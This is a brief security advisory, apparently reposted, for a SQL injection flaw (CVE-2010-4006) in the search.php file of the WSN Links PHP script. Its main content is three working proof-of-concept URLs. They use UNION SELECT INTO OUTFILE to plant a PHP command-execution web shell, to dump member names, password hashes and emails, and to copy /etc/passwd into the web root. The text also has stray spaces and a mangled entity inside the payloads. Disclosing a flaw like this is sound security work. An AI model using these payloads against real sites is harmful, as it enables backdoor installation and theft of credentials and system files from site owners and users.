WSN Links is an advanced PHP-based/MySQL search script, WSN Links < 6.0.1,< 5.1.51;, < 5.0.81 version of the search. php file existsSQL injectionvulnerabilities that could lead to sensitive information disclosure.
[+]info:
'WSN Links' SQL Injection Vulnerability (CVE-2 0 1 0-4 0 0 6)
Mark Stanislav - mark.stanislav@gmail.com
[+]poc:
A ‘UNION SELECT’ which results in a PHP shell-execution script
http://example.com/search.php?namecondition=IS NULL))%20UNION%2 0((SELECT%2 0"<? php%20system($_REQUEST[cmd]);%2 0?& gt;"%20INTO%20OUTFILE&namesearch=/var/www/exec. php&action=filter&filled=1&whichtype=categories
A ‘UNION SELECT’ which results in a member’s name, password hash, and e-mail to be extracted to a file
http://example.com/search.php?namecondition=IS NOT NULL))%20UNION%2 0((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass. txt&action=filter&filled=1&whichtype=categories
A ‘UNION SELECT’ which results in the /etc/passwd file being copied to a web directory file
http://example.com/search.php?namecondition=IS NOT NULL))%20UNION%2 0((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd. txt&action=filter&filled=1&whichtype=categories
[+]Reference:
http://www.wsnlinks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006
http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/